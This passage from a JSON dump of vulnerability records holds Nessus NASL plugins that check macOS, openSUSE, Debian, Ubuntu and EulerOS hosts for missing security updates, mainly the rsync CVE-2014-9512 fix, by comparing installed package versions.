value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('lists.inc');\ninclude('vcf_extras_apple.inc'); \n\napp_info = vcf::apple::macos::get_app_info();\n\nconstraints = [\n { 'max_version' : '10.15.4', 'min_version' : '10.15', 'fixed_build' : '19F96', 'fixed_display' : 'macOS Catalina 10.15.5' },\n { 'max_version' : '10.13.6', 'min_version' : '10.13', 'fixed_build' : '17G13033', 'fixed_display' : '10.13.6 Security Update 2020-003' },\n { 'max_version' : '10.14.6', 'min_version' : '10.14', 'fixed_build' : '18G5033', 'fixed_display' : '10.14.6 Security Update 2020-003' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:40:21", "description": "rsync was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2014-9512: rsync allowed remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path (boo#915410).", "cvss3": {}, "published": "2016-06-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rsync (openSUSE-2016-803)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rsync", "p-cpe:/a:novell:opensuse:rsync-debuginfo", "p-cpe:/a:novell:opensuse:rsync-debugsource", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-803.NASL", "href": "https://www.tenable.com/plugins/nessus/91887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-803.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91887);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-9512\");\n\n script_name(english:\"openSUSE Security Update : rsync (openSUSE-2016-803)\");\n script_summary(english:\"Check for the openSUSE-2016-803 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"rsync was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2014-9512: rsync allowed remote attackers to write\n to arbitrary files via a symlink attack on a file in the\n synchronization path (boo#915410).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=915410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rsync-3.1.1-2.10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rsync-debuginfo-3.1.1-2.10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rsync-debugsource-3.1.1-2.10.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo / rsync-debugsource\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-18T18:31:22", "description": "The remote Debian 10 host has packages installed that are affected by a vulnerability as referenced in the dla-3481 advisory.\n\n - usrsctp before 2019-12-20 has out-of-bounds reads in sctp_load_addresses_from_init. (CVE-2019-20503)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-07-18T00:00:00", "type": "nessus", "title": "Debian DLA-3481-1 : libusrsctp - LTS security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-20503"], "modified": "2023-07-18T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "p-cpe:/a:debian:debian_linux:libusrsctp-dev", "p-cpe:/a:debian:debian_linux:libusrsctp-examples", "p-cpe:/a:debian:debian_linux:libusrsctp1"], "id": "DEBIAN_DLA-3481.NASL", "href": "https://www.tenable.com/plugins/nessus/178397", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dla-3481. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(178397);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/18\");\n\n script_cve_id(\"CVE-2019-20503\");\n\n script_name(english:\"Debian DLA-3481-1 : libusrsctp - LTS security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 10 host has packages installed that are affected by a vulnerability as referenced in the dla-3481\nadvisory.\n\n - usrsctp before 2019-12-20 has out-of-bounds reads in sctp_load_addresses_from_init. (CVE-2019-20503)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953270\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/libusrsctp\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/lts/security/2023/dla-3481\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2019-20503\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/buster/libusrsctp\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the libusrsctp packages.\n\nFor Debian 10 buster, this problem has been fixed in version 0.9.3.0+20190127-2+deb10u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-20503\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/07/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libusrsctp-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libusrsctp-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libusrsctp1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! preg(pattern:\"^(10)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 10.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '10.0', 'prefix': 'libusrsctp-dev', 'reference': '0.9.3.0+20190127-2+deb10u1'},\n {'release': '10.0', 'prefix': 'libusrsctp-examples', 'reference': '0.9.3.0+20190127-2+deb10u1'},\n {'release': '10.0', 'prefix': 'libusrsctp1', 'reference': '0.9.3.0+20190127-2+deb10u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libusrsctp-dev / libusrsctp-examples / libusrsctp1');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:39:38", "description": "rsync was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2014-9512: rsync allowed remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path (boo#915410).", "cvss3": {}, "published": "2016-06-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rsync (openSUSE-2016-764)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rsync", "p-cpe:/a:novell:opensuse:rsync-debuginfo", "p-cpe:/a:novell:opensuse:rsync-debugsource", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-764.NASL", "href": "https://www.tenable.com/plugins/nessus/91865", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-764.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91865);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-9512\");\n\n script_name(english:\"openSUSE Security Update : rsync (openSUSE-2016-764)\");\n script_summary(english:\"Check for the openSUSE-2016-764 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"rsync was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2014-9512: rsync allowed remote attackers to write\n to arbitrary files via a symlink attack on a file in the\n synchronization path (boo#915410).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=915410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"rsync-3.1.0-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"rsync-debuginfo-3.1.0-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"rsync-debugsource-3.1.0-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo / rsync-debugsource\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T15:02:48", "description": "rsync was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - Path spoofing attack vulnerability (CVE-2014-9512).", "cvss3": {}, "published": "2015-02-11T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rsync (openSUSE-2015-124)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rsync", "p-cpe:/a:novell:opensuse:rsync-debuginfo", "p-cpe:/a:novell:opensuse:rsync-debugsource", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-124.NASL", "href": "https://www.tenable.com/plugins/nessus/81286", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-124.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81286);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-9512\");\n\n script_name(english:\"openSUSE Security Update : rsync (openSUSE-2015-124)\");\n script_summary(english:\"Check for the openSUSE-2015-124 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"rsync was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - Path spoofing attack vulnerability (CVE-2014-9512).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=915410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rsync-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"rsync-3.1.0-21.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"rsync-debuginfo-3.1.0-21.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"rsync-debugsource-3.1.0-21.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rsync-3.1.1-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rsync-debuginfo-3.1.1-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rsync-debugsource-3.1.1-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo / rsync-debugsource\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:33:12", "description": "It was discovered that rsync incorrectly handled invalid filenames. A malicious server could use this issue to write files outside of the intended destination directory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-22T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : rsync vulnerability (USN-2879-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:rsync", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts"], "id": "UBUNTU_USN-2879-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2879-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88084);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2014-9512\");\n script_xref(name:\"USN\", value:\"2879-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : rsync vulnerability (USN-2879-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that rsync incorrectly handled invalid filenames. A\nmalicious server could use this issue to write files outside of the\nintended destination directory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2879-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rsync package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-9512\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'rsync', 'pkgver': '3.1.0-2ubuntu0.2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'rsync');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:16:12", "description": "According to the version of the rsync package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - rsync 3.1.1 allows remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path.(CVE-2014-9512)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : rsync (EulerOS-SA-2021-2444)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2021-09-16T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:rsync", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2444.NASL", "href": "https://www.tenable.com/plugins/nessus/153310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153310);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/16\");\n\n script_cve_id(\n \"CVE-2014-9512\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : rsync (EulerOS-SA-2021-2444)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the rsync package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - rsync 3.1.1 allows remote attackers to write to\n arbitrary files via a symlink attack on a file in the\n synchronization path.(CVE-2014-9512)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout 